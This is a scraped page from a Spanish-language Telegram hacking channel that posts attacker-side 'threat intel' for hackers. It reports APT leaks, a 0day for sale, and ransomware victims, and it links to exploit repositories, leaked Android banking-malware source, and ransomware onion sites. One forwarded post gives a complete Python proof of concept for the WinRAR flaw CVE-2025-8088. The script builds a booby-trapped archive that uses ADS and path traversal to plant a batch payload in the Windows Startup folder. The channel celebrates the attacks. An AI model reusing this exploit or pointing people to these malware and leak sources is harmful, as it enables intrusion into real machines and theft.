FSEC INTEL ES 2.0 📡 🏴‍☠️ – Telegram
FSEC INTEL ES 2.0 📡 🏴‍☠️
545 subscribers
272 photos
27 videos
14 files
183 links
Inteligencia de Amenazas de Hackers para Hackers. 📡

Estamos de vuelta!!

X : https://x.com/FsecIntelEs
Download Telegram
Hackers logran piratear a grupo APT norcoreano dedicado a atacar a Corea del Sur 🇰🇵

Un duo de Hacker logro obtener herramientas, Exploits, datos de VPS y de computadoras personales de un miembro de un grupo de Hackers patrocinados por Corea del Norte el cual llamaron Kimsuky.

Mediante un Papers de la mítica revista para Hackers Phrack, los Hackers Saber y cyb0rg dieron a conocer el Hack, el cual llamaron "APT Down - The North Korea Files" en donde exponen contraseñas de VPS's, datos de navegación y captura de pantalla de un pirata informático el cual se presume que se trate de un Chino trabajando para el gobierno norcoreano.

https://data.ddosecrets.com/APT%20Down%20-%20The%20North%20Korea%20Files/


#coreadelnorte #hacker #busted #leak #apt
😱12👀6🤣21👎1
This media is not supported in your browser
VIEW IN TELEGRAM
Piratas informáticos iranies ponen a la venta Exploit 0Day de Gestor de combustible Gasboy 🇮🇷💣

Gasboy es un sistema el cual permite administrar gasolineras de manera centralizada. El grupo de Hackers Pro-Iran APT Iran se encuentra vendiendo un Exploit dia cero de tipo RCE por un valor de 15,000$, mediante un video en su cuenta de Telegram se puede ver como los piratas logran ejecutar comandos en un servidor aparentemente comprometido.

FUENTE:
https://news.1rj.ru/str/APTIRAN

#aptiran #iran #hacker #exploit
🔥11
Forwarded from Private Forum
🛸CVE-2025-8088 : WinRAR exploiting CVE-2025-8088 using ADS and path traversal
🪮Code :
import subprocess
import os
import argparse

def create_malicious_rar(output_file, decoy_file, traversal_levels=5):
"""
Creates a malicious RAR exploiting CVE-2025-8088 using ADS and path traversal.
"""
# Create payload content
payload_content = "@echo off\r\nstart calc.exe"
payload_path = "payload.bat"
with open(payload_path, 'w') as f:
f.write(payload_content)

# Create decoy if not provided
if not decoy_file:
decoy_file = "decoy.txt"
with open(decoy_file, 'w') as f:
f.write("Harmless decoy file.")

# Build traversal path with space for bypass
traversal = "/../ " * traversal_levels
ads_path = f"{os.path.basename(decoy_file)}:{traversal}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/payload.bat"

# Add decoy to RAR
subprocess.run(["rar", "a", output_file, decoy_file], check=True)

# Add ADS payload with traversal (redirect payload content)
with open(payload_path, 'rb') as payload:
subprocess.run(["rar", "a", output_file, ads_path], stdin=payload, check=True)

# Clean up
os.remove(payload_path)
if decoy_file == "decoy.txt":
os.remove(decoy_file)

print(f"Malicious RAR created: {output_file}")

if __name__ == "__main__":
parser = argparse.ArgumentParser(denoscription="POC for CVE-2025-8088 WinRAR ADS Traversal")
parser.add_argument("--output", default="poc_8088.rar", help="Output RAR file")
parser.add_argument("--decoy", help="Path to decoy file (e.g., PDF)")
parser.add_argument("--levels", type=int, default=5, help="Traversal levels (4-8)")

args = parser.parse_args()
create_malicious_rar(args.output, args.decoy, args.levels)

🍀Github : https://github.com/search?q=CVE-2025-8088
Collection
Please open Telegram to view this post
VIEW IN TELEGRAM
😱8👍1👎1🔥1
Forwarded from Private Forum
This media is not supported in your browser
VIEW IN TELEGRAM
🛸CVE-2025-25256 : Fortinet FortiSIEM - unauthenticated OS Command Injection (RCE)
🪮PoC : https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
Collection
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👎1
Gobierno indio Hacked 🏴‍☠️ 🇮🇳

#fuckgob #india
🔥9
He estado jugando con un Exploit 0Day muy bonito regalado por los chicos de Scattered Spider alias Lapsus$, los chicos han estado muy activos este mes atacando Burgen King Brazil junto a la policia brasileña y en las ultimas semanas a estado amenazando al CEO de la empresa de ciberseguridad Crowdstrike por tirar informacion de sus servidores.

Recientemente publicaron un Exploit el cual permite subir ficheros al servidor victima sin ningún tipo de restricción, CVE-2025-31324 es el cve para el Exploit, les dejo el Github...

https://github.com/antichainalysis/sap-netweaver-0day-CVE-2025-31324

FUENTE:
https://news.1rj.ru/str/+vs8Sn8tCsrk1ZDk1

#exploit #rce #scattered #lapsus #github
15👏2
Se Filtra codigo fuente de Malware Bancario para Android 📡

Investigadores de hunt.io dieron con un servidor en el cual lograron obtener toda la infraestructura de ERMAC V30, un Malware Bancario dirigido a Usuario de Android, ERMAC tiene capacidades altamente peligrosas como la de asimilar y superponer mas de 700 aplicaciones bancarias capaz de robar usuarios y contraseñas, también el Malware es capaz de enviar SMS y realizar llamadas telefónicas.

https://hunt.io/blog/ermac-v3-banking-trojan-source-code-leak
https://github.com/vxunderground/MalwareSourceCode/tree/main/Android/Android.Ermac.3

#malware #leak #ermac #android #botnet
🔥13🥰41
Justicia Penal Militar y Policial Colombia golpeada por Ransomware 45TB exfiltrados 🇨🇴

Organización gubernamental colombiana encargada
de realizar seguimmientos y sanciones contra
faltas de miembros de las fuerzas publicas fue
pirateada por Gunra Ransomware una pandilla
relativamente nueva dentro de la escena del
Ransomware.

Al parecer la pandilla logro exfiltrar una gran
cantidad de ficheros los cuales llegaron a pesar
45TB, tambien se puedo observar otras victimas
latinas como ser: una farmaceutica argentina,
una aseguradora nicaragüense y un Ecommerce
brasileño.

FUENTE:
http://gunrabxbig445sjqa535uaymzerj6fp4nwc6ngc2xughf2pedjdhk4ad.onion/

#colombia #gunra #onion #fuckgob
🔥5
CEPHALUS 🔐

http://cephalus6oiypuwumqlwurvbmwsfglg424zjdmywfgqm4iehkqivsjyd.onion/


#ransomware #onion
2